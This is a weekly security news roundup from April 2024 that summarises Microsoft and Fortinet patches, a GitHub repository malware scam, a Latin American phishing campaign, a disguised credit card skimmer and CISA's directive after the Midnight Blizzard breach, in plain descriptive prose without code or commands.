Weekly Security News – 15th April 2024

Welcome to this week’s Security News. We’ve collated the best articles from the around the internet and put them all into one place. If you have any queries or concerns about anything in this week’s news, then please get in touch with our team who can advise further. For our existing clients, if we believe anything may affect your organisation, our team will be in touch directly. 

Vulnerabilities and Patches

Microsoft Releases April 2024 Security Updates

Microsoft has released security updates to address 149 vulnerabilities, including two CVE-2024-26234 and CVE-2024-29988 that are actively exploited and four rated as critical, which are CVE-2024-21322, CVE-2024-21323, CVE-2024-29053 and CVE-2024-29990. The platforms known to be affected are Microsoft Windows, Microsoft Defender Smartscreen, Microsoft Azure Kubernetes Service and Microsoft Defender for IoT. Affected organisations are encouraged to review Microsoft’s April 2024 Security Update Summary and apply the relevant updates.

Fortinet Releases Multiple Security Advisories

Fortinet has released security advisories to address multiple vulnerabilities CVE-2023-45590, CVE-2023-41677, CVE-2023-45588 & CVE-2024-31492. The security advisories address one critical vulnerability in FortiClientLinux, one high vulnerability in FortiClientMac, and one high vulnerability in the SSL-VPN component of FortiOS and FortiProxy. FortiClient, FortiOS, and FortiProxy all provide a virtual private network solution. The platforms known to be affected are Fortinet FortiOS, Fortinet FortProxy and Fortinet FortiClient. Affected organisations are encouraged to review the following Fortinet Security Advisories below and apply the relevant updates.

Cyber Attacks

GitHub’s Fake Popularity Scam Tricking Developers into Downloading Malware

Threat actors are now taking advantage of GitHub’s search functionality to trick unsuspecting users looking for popular repositories into downloading spurious counterparts that serve malware. The latest assault on the open-source software supply chain involves concealing malicious code within Microsoft Visual Code project files that’s designed to download next-stage payloads from a remote URL, Checkmarx said in a report shared with The Hacker News. The idea is to manipulate the search rankings in GitHub to bring threat actor-controlled repositories to the top when users filter and sort their results based on the most recent updates and increase the popularity via bogus stars added via fake accounts.

Cybercriminals Targeting Latin America with Sophisticated Phishing Scheme

A new phishing campaign has set its eyes on the Latin American region to deliver malicious payloads to Windows systems. “The phishing email contained a ZIP file attachment that when extracted reveals an HTML file that leads to a malicious file download posing as an invoice,” Trustwave SpiderLabs researcher Karla Agregado said. The HTML file points containing a link (“facturasmex[.]cloud”) that displays an error message saying, “this account has been suspended,” but when visited from an IP address geolocated to Mexico, loads a CAPTCHA verification page that uses Cloudflare Turnstile.

Articles

Sneaky Credit Card Skimmer Disguised as Harmless Facebook Tracker

Cybersecurity researchers have discovered a credit card skimmer that’s concealed within a fake Meta Pixel tracker script in an attempt to evade detection. Sucuri said that the malware is injected into websites through tools that allow for custom code, such as WordPress plugins like Simple Custom CSS and JS or the “Miscellaneous Scripts” section of the Magento admin panel.  To mitigate such risks, it’s recommended to keep the sites up-to-date, periodically review admin accounts to determine if all of them are valid, and update passwords on a frequent basis.

U.S. Federal Agencies Ordered to Hunt for Signs of Microsoft Breach and Mitigate Risks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday issued an emergency directive (ED 24-02) urging federal agencies to hunt for signs of compromise and enact preventive measures following the recent compromise of Microsoft’s systems that led to the theft of email correspondence with the company. The attack, which came to light earlier this year, has been attributed to a Russian nation-state group tracked as Midnight Blizzard (aka APT29 or Cozy Bear). Last month, Microsoft revealed that the adversary managed to access some of its source code repositories but noted that there is no evidence of a breach of customer-facing systems.